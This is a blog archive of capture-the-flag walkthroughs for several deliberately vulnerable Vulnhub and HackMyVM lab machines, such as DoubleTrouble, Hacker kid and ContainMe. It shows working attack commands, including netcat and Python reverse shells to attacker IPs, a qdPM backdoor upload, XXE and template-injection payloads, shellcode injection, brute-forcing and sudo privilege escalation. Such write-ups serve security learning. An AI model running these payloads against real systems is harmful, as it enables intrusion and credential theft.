分类目录归档:linux靶场

Vulnhub DoubleTrouble Walkthrough

发表评论

Vulnhub DoubleTrouble Walkthrough

https://www.vulnhub.com/entry/doubletrouble-1,743/

Scan port 80.

~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
 403,404,500 --wildcard   -o 80.log
 ===============================================================
 /uploads              (Status: 301) [Size: 318] [--> http://192.168.56.100/uploads/]
 /images               (Status: 301) [Size: 317] [--> http://192.168.56.100/images/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /template             (Status: 301) [Size: 319] [--> http://192.168.56.100/template/]
 /core                 (Status: 301) [Size: 315] [--> http://192.168.56.100/core/]
 /install              (Status: 301) [Size: 318] [--> http://192.168.56.100/install/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
 /index.php            (Status: 200) [Size: 5814]
 /check.php            (Status: 200) [Size: 0]
 /sf                   (Status: 301) [Size: 313] [--> http://192.168.56.100/sf/]
 /readme.txt           (Status: 200) [Size: 470]
 /robots.txt           (Status: 200) [Size: 26]
 /secret               (Status: 301) [Size: 317] [--> http://192.168.56.100/secret/]

<!--more-->

In /secret, download doubletrouble.jpg, get password and creds.txt.

 ~ stegseek --crack -sf doubletrouble.jpg        
 StegSeek version 0.5
 Progress: 2.00% (2794835 bytes)
 [i] --> Found passphrase: "92camaro"
 [i] Original filename: "creds.txt"
 [i] Extracting to "doubletrouble.jpg.out"                    
 ~ mv doubletrouble.jpg.out creds.txt                
 ~ cat creds.txt                                                                                          otisrush@localhost.com
 otis666⏎

Search exploit of qdPM.

```bash
~ searchsploit qdPM

Exploit Title | Path

...
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py ... 


Use POC to upload backdoor.

 ```bash
~ python3 50175.py --host 'http://192.168.56.100/' -u otisrush@localhost.com -p otis666                                              python3-0 | 1 [14:53:09]

 You are not able to use the designated admin account because they do not have a myAccount page.

 Backdoor uploaded at - > http://192.168.56.100//uploads/users/?cmd=whoami

Check if backdoor works OK.

 ~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=whoami'
 <pre>www-data
 </pre>⏎

Get reverse shell.

```bash
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash';
────────────────────────────────────────────────────────────────────────────────────────────────────────

~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:53330.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$


Check sudo -l.

```bash
 www-data@doubletrouble:/home$ ls -la
 ls -la
 total 8
 drwxr-xr-x  2 root root 4096 Sep 11 13:51 .
 drwxr-xr-x 18 root root 4096 Dec 17  2020 ..
 www-data@doubletrouble:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on doubletrouble:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on doubletrouble:
     (ALL : ALL) NOPASSWD: /usr/bin/awk

Get root.

www-data@doubletrouble:/home$ sudo awk 'BEGIN {system("/bin/sh")}'
 sudo awk 'BEGIN {system("/bin/sh")}'
 # id;hostname
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 doubletrouble

Vulnhub Deathnote: 1 Walkthrough

发表评论

Vulnhub Deathnote: 1 Walkthrough

https://www.vulnhub.com/entry/deathnote-1,739/](https://www.vulnhub.com/entry/deathnote-1,739/

Easy one, key steps here.

Get notes.txt and user.txt from http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/.

Hydra ssh credentials with these 2 files.

~ hydra -L user.txt -P notes.txt -e nsr 192.168.56.100  ssh -t20 -F                                    
 ...
 [22][ssh] host: 192.168.56.100   login: l   password: death4me                                           ...

In /opt found hint and case.wav.

```bash
l@deathnote:/opt/L/fake-notebook-rule$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Aug 29 11:26 .
drwxr-xr-x 4 root root 4096 Aug 29 11:12 ..
-rw-r--r-- 1 root root 84 Aug 29 11:25 case.wav
-rw-r--r-- 1 root root 15 Aug 29 11:26 hint


Use cyberchef-->from hex, decode content of case.wav, get cGFzc3dkIDoga2lyYWlzZXZpbCA=.

Decode base64, get password of kira.

Get root

 ```bash
kira@deathnote:~$ sudo -l
 Matching Defaults entries for kira on deathnote:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User kira may run the following commands on deathnote:
     (ALL : ALL) ALL
 kira@deathnote:~$ sudo su root
 root@deathnote:/home/kira# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 deathnote
 root@deathnote:/home/kira#

VlunHub Hacker kid: 1.0.1 Walkthrough

发表评论

VlunHub Hacker kid: 1.0.1 Walkthrough

https://www.vulnhub.com/entry/hacker-kid-101,719/

Very good machine, learn some new stuff.

Scan ports, port 53 is interesting.

nmap -sV -sC -p- 192.168.33.144  -oN ports.log        
 ...
 PORT     STATE SERVICE VERSION
 53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
 | dns-nsid:
 |_  bind.version: 9.16.1-Ubuntu
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Notorious Kid : A Hacker
 9999/tcp open  http    Tornado httpd 6.1
 |_http-server-header: TornadoServer/6.1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

```bash
~ gobuster dir -u http://192.168.33.144 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
403,404,500 --wildcard -o 80.log
...

/images (Status: 301) [Size: 317] [--> http://192.168.33.144/images/]
/index.php (Status: 200) [Size: 3597]
/css (Status: 301) [Size: 314] [--> http://192.168.33.144/css/]
/form.html (Status: 200) [Size: 10219]
/app.html (Status: 200) [Size: 8048]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.144/javascript/]


Found hints in index.php source code.

```bash
 <div class="container py-5">
   <h1>Thanks</h1>

  TO DO: Use a GET parameter page_no  to view pages.
 --></code></pre>
<p>Fuzz index.php with page_no.</p>
<pre><code class="language-bash"> ~ seq 1 100 > dic.txt
 ~ wfuzz -u 'http://192.168.33.144/index.php?page_no=FUZZ'    -w dic.txt --hh 3654
 ...
 =====================================================================                                  
 000000021:   200        116 L    310 W      3849 Ch     "21"</code></pre>
<p>Get more info with page_no=21.</p>
<pre><code class="language-bash"> ~ curl 'http://192.168.33.144/index.php?page_no=21'
 <center>
         <font color="red">

 Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
 <font color="red">
 </center></code></pre>
<p>Dig another domain name, write it into /etc/hosts.</p>
<pre><code class="language-bash">~ dig @192.168.33.144 hackers.blackhat.local                                                             ...
 ;; AUTHORITY SECTION:
 blackhat.local.         3600    IN      SOA     blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600
 ...</code></pre>
<p>Visit hackerkid.blackhat.local, use XXE (XML External Entity) Injection.</p>
<p>```bash
~ curl '<a href="http://hackerkid.blackhat.local/process.php&#039">http://hackerkid.blackhat.local/process.php&#039</a>;     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'file:///etc/passwd\'>
]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
...
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
bind:x:126:133::/var/cache/bind:/usr/sbin/nologin</p>
<pre><code>
Read bachrc file with base64.

 ```bash
~ curl 'http://hackerkid.blackhat.local/process.php'     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'php://filter/convert.base64-encode/resource=/home/saket/.bashrc\'>]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
 ...
 Sorry, IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc...
 IFBhc3N3b3JkIGZvciBydW5uaW5nIHB5dGhvbiBhcHAKdXNlcm5hbWU9ImFkbWluIgpwYXNzd29yZD0iU2FrZXQhIyQlQCEhIgo= is not available !!!</code></pre>
<p>Decode base64. Get password of port 9999, but should login with name "saket".</p>
<pre><code class="language-bash"> #Setting Password for running python app
 username="admin"
 password="Saket!#$%@!!"</code></pre>
<p>Login port 9999.</p>
<p>image-20210906141418214.png</p>
<p>Input param "name", get output in webpage.</p>
<p>image-20210906141454486.png</p>
<p>Enter shell code, get reverse shell through nc, then spawn a new full shell.</p>
<p>```bash
{%import os%}{{os.system("nc 192.168.33.128 1234|/bin/bash|nc 192.168.33.128 2234")}}</p>
<pre><code>
Getcap enum.

 ```bash
saket@ubuntu:~$ /sbin/getcap / -r 2>/dev/null
 /sbin/getcap / -r 2>/dev/null
 /usr/bin/python2.7 = cap_sys_ptrace+ep
 /usr/bin/traceroute6.iputils = cap_net_raw+ep
 /usr/bin/ping = cap_net_raw+ep
 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
 /usr/bin/mtr-packet = cap_net_raw+ep
 ...</code></pre>
<blockquote>
<p>Reference: <a href="https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc">https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc</a></p>
</blockquote>
<p>Download the POC and upload to server.</p>
<pre><code class="language-bash"> wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py</code></pre>
<p>Choose a root process to be injected.</p>
<pre><code class="language-bash"> saket@ubuntu:~$ ps aux|grep root
 ...
 root         935  0.0  0.4 199776 19968 ?        Ss   12:54   0:00 /usr/sbin/apache2 -k start
 ...</code></pre>
<p>Run the POC, then check port.</p>
<p>```bash
saket@ubuntu:~$ python2.7 inject.py 935
python2.7 inject.py 935
Instruction Pointer: 0x7fd118b560daL
Injecting Shellcode at: 0x7fd118b560daL
Shellcode Injected!!
Final Instruction Pointer: 0x7fd118b560dcL
saket@ubuntu:~$ ss -tnlp
ss -tnlp
State     Recv-Q    Send-Q        Local Address:Port       Peer Address:Port    Process                 ...
LISTEN    0         0                   0.0.0.0:5600            0.0.0.0:*                                ...</p>
<pre><code>
Connect port 5600 and get root shell.

```bash
 ~ nc 192.168.33.144 5600              
 id
 uid=0(root) gid=0(root) groups=0(root)

HackMyVm Warez Simple Walkthrough

发表评论

HackMyVm Warez Simple Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Warez

Two key steps.

First step, use Aria2 WebUI to download authorzied_keys into /home/carolina/.ssh, then we can login ssh as user carolina.

image-20210901220643988.png

Second step, use rtorrent to download authorzied_keys again into /root/.ssh.

 carolina@warez:~$ tail .rtorrent.rc
 # SCGI Connectivity (for alternative rtorrent interfaces, XMLRPC)
 # Use a IP socket with scgi_port, or a Unix socket with scgi_local.
 # schedule can be used to set permissions on the unix socket.
 #
 #network.scgi.open_port = "127.0.0.1:5000"
 #network.scgi.open_local = (cat,(session.path),/rpc.sock)
 #schedule2 = socket_chmod, 0, 0, "execute.nothrow=chmod,770,(cat,(session.path),/rpc.sock)"
 execute.throw = mkdir,/root/.ssh
 execute.throw = wget,http://192.168.56.150/authorized_keys,-O,/root/.ssh/authorized_keys

Vulnhub ContainMe: 1 Walkthrough

发表评论

Vulnhub ContainMe: 1 Walkthrough

https://www.vulnhub.com/entry/containme-1,729/

Interesting machine. Need ELF analysis, multi-layer port forward, etc. Learned new things.

Scan ports.

 ~ nmap -sV -sC -p- 192.168.33.142  -oN ports.log[[195/235]
 ...
 22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
 |_  256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
 80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
 |_http-server-header: Apache/2.4.29 (Ubuntu)
 |_http-title: Apache2 Ubuntu Default Page: It works
 2222/tcp open  EtherNetIP-1?
 |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
 8022/tcp open  ssh           OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
 |   256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
 |_  256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u http://192.168.33.142 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /info.php             (Status: 200) [Size: 68948]
 /index.html           (Status: 200) [Size: 10918]
 /index.php            (Status: 200) [Size: 329]

Check index.php, it will list files of current dir.

 ~ curl http://192.168.33.142/index.php
 <html>
 <body>
         <pre>
         total 28K
 drwxr-xr-x 2 root root 4.0K Jul 16 11:40 .
 drwxr-xr-x 3 root root 4.0K Jul 15 17:11 ..
 -rw-r--r-- 1 root root  11K Jul 15 17:11 index.html
 -rw-r--r-- 1 root root  154 Jul 16 11:40 index.php
 -rw-r--r-- 1 root root   20 Jul 15 17:27 info.php
         <pre>

 <!--  where is the path ?  -->

 </body>
 </html>

Maybe index.php has LFI. Fuzz the param name.

~ wfuzz -u 'http://192.168.33.142/index.php?FUZZ=id'  --hh 329  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013516:   200        10 L     13 W       79 Ch       "path"

It has code injection.

```bash
~ curl 'http://192.168.33.142/index.php?path=;id'; ...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
...


Get reverse shell as www-data.

 ```bash
~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.142.
 Ncat: Connection from 192.168.33.142:60146.
 bash: cannot set terminal process group (242): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@host1:/var/www/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@host1:/var/www/html$
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ curl 'http://192.168.33.142/index.php?path=;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'

Now we have reverse shell of host1. In /home/mike, found interesting file named 1cryptupx.

```bash
www-data@host1:/home/mike$ ls -la
ls -la
total 384
drwxr-xr-x 5 mike mike 4096 Jul 30 04:36 .
drwxr-xr-x 3 root root 4096 Jul 19 15:03 ..
lrwxrwxrwx 1 root mike 9 Jul 19 15:06 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 mike mike 3771 Apr 4 2018 .bashrc
drwx------ 2 mike mike 4096 Jul 30 04:36 .cache
drwx------ 3 mike mike 4096 Jul 30 04:36 .gnupg
-rw-r--r-- 1 mike mike 807 Apr 4 2018 .profile
drwx------ 2 mike mike 4096 Jul 19 15:27 .ssh
-rwxr-xr-x 1 mike mike 358668 Jul 30 04:39 1cryptupx


Run 1cryptupx with any string param, showed decompress error.

 ```bash
www-data@host1:/home/mike$ ./1cryptupx string
 ./1cryptupx string
 ░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
 ██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
 ██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
 ██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
 ╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
 ░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

 Unable to decompress.

We need to download 1cryptupx to local kali. Here I use xxd to display hex data of the file.

```bash
curl 'http://192.168.33.142/index.php?path=;xxd%20-ps%20/home/mike/1cryptupx';
...
0f7fb80039b93030919edc6e21ff1f407f40342f624343421f9e7f281839
f2788f787f88ffec8617bba37f0090ff807fb9d845c1d87fac7fe04d143c
39e0101a7fb292b393a1ffab9b7f680739f24226c468b268a2e1b8281808
ffd27fd19edc6e1f807f70e098ff3b902f36d77f604b4e28ff2d76c145eb
7f302f812d98867f277f0fa6db548103af977ff4ff9224098b00002a49ff
000000005550582100000000555058210d1608096e14e678c6222cc76007
000042020000d0a90d00491b00a2f4000000
<pre>

<!-- where is the path ? -->

</body>
</html>


Then restore 1cryptupx  through cyberchef.

image-20210901141024237.png

Use upx to decompress.

 ```bash
~ upx -d -o dec 1cryptupx                                                                                                                                                                                               fish-0 | 0 [14:11:26]
                        Ultimate Packer for eXecutables
                           Copyright (C) 1996 - 2020
 UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

         File size         Ratio      Format      Name
    --------------------   ------   -----------   -----------
     895440 <-    358668   40.05%   linux/amd64   dec

 Unpacked 1 file.

Decompile the file in ghidra, found key string "Unable to decompress", locate the key function.

 undefined8 FUN_004016ad(int param_1,long param_2)

 {
   ...
   if (param_1 == 2) {
     uVar3 = *(undefined8 *)(param_2 + 8);
     uStack1056 = 0x401721;
     iVar1 = thunk_FUN_004010d6(uVar3,&DAT_004955cb);
     pcVar4 = "\nYou wish!";
     if (iVar1 != 0) {
       uStack1056 = 0x40173a;
       thunk_FUN_0040101e(auStack1048,uVar3);
       uStack1056 = 0x401742;
       lVar2 = thunk_FUN_004010d6(auStack1048);
       if (auStack1048[lVar2 + -1] == '\n') {
         auStack1048[lVar2 + -1] = 0;
       }
       uStack1056 = 0x40175d;
       uVar3 = FUN_00401d90(auStack1048,"$2b$15$TXl.yuAF49958vsn1dqPfe");
       uStack1056 = 0x40176c;
       iVar1 = thunk_FUN_004010d6(uVar3,
                                  "$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6");
       if (iVar1 == 0) {
         uStack1056 = 0x40177b;
         FUN_00453290(0,0,0);
         uStack1056 = 0x401787;
         FUN_0041ddc0("/bin/bash");
         return 0;
       }
       pcVar4 = "Unable to decompress.";
     }
     uStack1056 = 0x401795;
     FUN_0041eaa0(pcVar4);
   }
   return 0;
 }

In this function, we get an hash string. It means if we input the correct password, the function will call "/bin/bash" as root.

We save the hash string into hash.txt.

 ~ echo '$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6' > hash.txt

Use john to brute force the hash.

 ~ john --wordlist=/usr/share/wordlists/seclists/Passwords/Common-Credentials/10k-most-common.txt  hash.txt                                                                                      vim-0 | 0 [20:32:26]
 Using default input encoding: UTF-8
 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
 Cost 1 (iteration count) is 32768 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 mike             (?)
 1g 0:00:02:03 DONE (2021-08-31 20:36) 0.008120g/s 1.461p/s 1.461c/s 1.461C/s internet..john
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed

Now we get the password of the file.

Search files with SUID.

 www-data@host1:/home/mike$ find / -perm -u=s 2>/dev/null
 find / -perm -u=s 2>/dev/null
 /usr/share/man/zh_TW/crypt
 /usr/bin/newuidmap
 /usr/bin/newgidmap
 ...

Notice the first file, run crypt with password, we get root on host1.

```bash
www-data@host1:/home/mike$ /usr/share/man/zh_TW/crypt mike
/usr/share/man/zh_TW/crypt mike
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
root@host1:/home/mike# id
uid=0(root) gid=33(www-data) groups=33(www-data)


Check local ips, notice an interesting IP in another network range.

```bash
 root@host1:/home/mike# ifconfig
 ...
 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
         inet 172.16.20.2  netmask 255.255.255.0  broadcast 172.16.20.255
         inet6 fe80::216:3eff:fe46:6b29  prefixlen 64  scopeid 0x20<link>
 ...

Scan for live hosts on this ip range with bash command, found live host 172.16.20.6.

 root@host1:~# for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5  >/dev/null && echo "172.16.20.$i" &) ;done
 172.16.20.2
 172.16.20.6

Scan for open ports of host2.

 for port in {1..65535}; do
   echo >/dev/tcp/172.16.20.6/$port &&
     echo "port $port is open"
 done 2>/dev/null |grep open
 ...
 port 22 is open

Here is a little tricky. We can login host2 with user name mike and id_rsa of mike on host1.

 root@host1:/# cd /home/mike/.ssh/
 root@host1:/home/mike/.ssh# ssh mike@172.16.20.6 -i id_rsa

 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.

 Last login: Mon Jul 19 20:23:18 2021 from 172.16.20.2
 mike@host2:~$

Check local ports of host2, mysql is running.

 mike@host2:/home$ ss -ntlp
 State               Recv-Q               Send-Q                              Local Address:Port                              Peer Address:Port              
 LISTEN              0                    80                                      127.0.0.1:3306                                   0.0.0.0:*                  
 LISTEN              0                    128                                 127.0.0.53%lo:53                                     0.0.0.0:*                  
 LISTEN              0                    128                                       0.0.0.0:22                                     0.0.0.0:*                  
 LISTEN              0                    128                                          [::]:22                                        [::]:*

We need to port forward 3306 outside, in order to brute force it.

First, on host1, we use ssh -L to map host2:3306 ==> host1:3306.

 root@host1:/home/mike/.ssh# ssh -g -L 3306:127.0.0.1:3306 mike@172.16.20.6 -i id_rsa

Check ports of host1, 3306 is open.

 root@host1:~# ss -ntlp
 State   Recv-Q   Send-Q      Local Address:Port      Peer Address:Port                                                                            
 LISTEN  0        128         127.0.0.53%lo:53             0.0.0.0:*       users:(("systemd-resolve",pid=138,fd=13))                              
 LISTEN  0        128               0.0.0.0:22             0.0.0.0:*       users:(("sshd",pid=199,fd=3))                                          
 LISTEN  0        128             127.0.0.1:3306           0.0.0.0:*       users:(("ssh",pid=1870,fd=5))                                          
 LISTEN  0        128                     *:80                   *:*       users:(("apache2",pid=613,fd=4),("apache2",pid=602,fd=4),("apache2",pid=592,fd=4),("apache2",pid=457,fd=4),("apache2",pid=375,fd=4),("apache2",pid=270,fd=4),("apache2",pid=269,fd=4),("apache2",pid=268,fd=4),("apache2",pid=257,fd=4))
 LISTEN  0        128                  [::]:22                [::]:*       users:(("sshd",pid=199,fd=4))                                          
 LISTEN  0        128                 [::1]:3306              [::]:*       users:(("ssh",pid=1870,fd=4))

Then we need to map host1:3306 outside to kali, but host1 has limits, so ssh and socat all don't work. We have to use chisel.

On kali, run chisel server.

 ~ ./chisel server -p 8080 --reverse  
 2021/09/01 13:26:59 server: Reverse tunnelling enabled
 2021/09/01 13:26:59 server: Fingerprint QJGGHnimzCp6x3qmFZtvSyGo1ycXNZT7o9iyG537DF8=
 2021/09/01 13:26:59 server: Listening on http://0.0.0.0:8080

Then on host1, run chisel client.

 root@host1:~# ./chisel client http://192.168.33.128:33060 R:3306:127.0.0.1:33060

Now check port of kali, port 3306 is open.

The path is: kali:3306 ==> host1:3306 ==> host2:3306.

 ~ ss -ntlp                                                                                                                                                          
 State                    Recv-Q                   Send-Q                                     Local Address:Port                                     Peer Address:Port
 LISTEN                   0                        50                                             127.0.0.1:9614                                          0.0.0.0:*  
 LISTEN                   0                        511                                            127.0.0.1:6463                                          0.0.0.0:*  
 LISTEN                   0                        4096                                                   *:3306                                                *:*  
 LISTEN                   0                        4096                                                   *:8080                                                *:*

Use medusa to bruteforce password of mysql on kali.

 ~ medusa  -h 127.0.0.1 -M mysql -u mike -P /usr/share/wordlists/rock_ascii.txt -t 50
 Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
 ...
 ACCOUNT FOUND: [mysql] Host: 127.0.0.1 User: mike Password: password [SUCCESS]
 ...

Next on host2, login mysql, get password of root.

 mysql> select * from users;
 +-------+---------------------+
 | login | password            |
 +-------+---------------------+
 | root  | bjsig4868fgjjeog    |
 | mike  | WhatAreYouDoingHere |
 +-------+---------------------+
 2 rows in set (0.00 sec)

Su to root on host2. Found mike.zip in /root.

 root@host2:~# ls -la
 total 28
 drwx------  4 root root 4096 Jul 19 20:35 .
 drwxr-xr-x 22 root root 4096 Jun 29 08:07 ..
 lrwxrwxrwx  1 root root    9 Jul 19 20:32 .bash_history -> /dev/null
 -rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
 drwxr-xr-x  3 root root 4096 Jul 15 14:47 .local
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 drwx------  2 root root 4096 Jul 15 14:41 .ssh
 -rw-------  1 root root  218 Jul 16 02:26 mike.zip

Unzip mike.zip with password from database. Get final flag.

 oot@host2:~# unzip mike.zip
 Archive:  mike.zip
 [mike.zip] mike password:
  extracting: mike                    
 root@host2:~# cat mike
 THM{_Y0U_F0UND_TH3_C0NTA1N3RS_}
 root@host2:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 host2

HackMyVm Klim Walkthrough

发表评论

HackMyVm Klim Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Klim

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100
 Host is up (0.0024s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
 |   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
 |_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Ubuntu Default Page: It works Annex02!
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found wordpress.

```bash
/index.html (Status: 200) [Size: 11331]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]


Use wpscan to scan /wordpress, but found nothing useful. Manually check /wp-contents/uploads, found an image.

```bash
 ~ wget http://192.168.56.100/wordpress/wp-content/uploads/2021/07/image.jpg
</code></pre>
<p>Found decrypt password, get file dump.</p>
<pre><code class="language-bash"> ~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt                                                                                                                                   steghide-0 | 1 [10:35:13]
 StegSeek version 0.5
 Progress: 10.94% (15259007 bytes)          

 [i] --> Found passphrase: "ichliebedich"
 [i] Original filename: "dump"
 [i] Extracting to "image.jpg.out"
 ~ mv image.jpg.out dump</code></pre>
<p>Found login credentials in dump.</p>
<pre><code class="language-bash">~ cat dump|grep pwd
 log=klim&pwd=ss7WhrrnnHOZC%239bQn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.26%2Fwordpress%2Fwp-admin%2F&testcookie=1
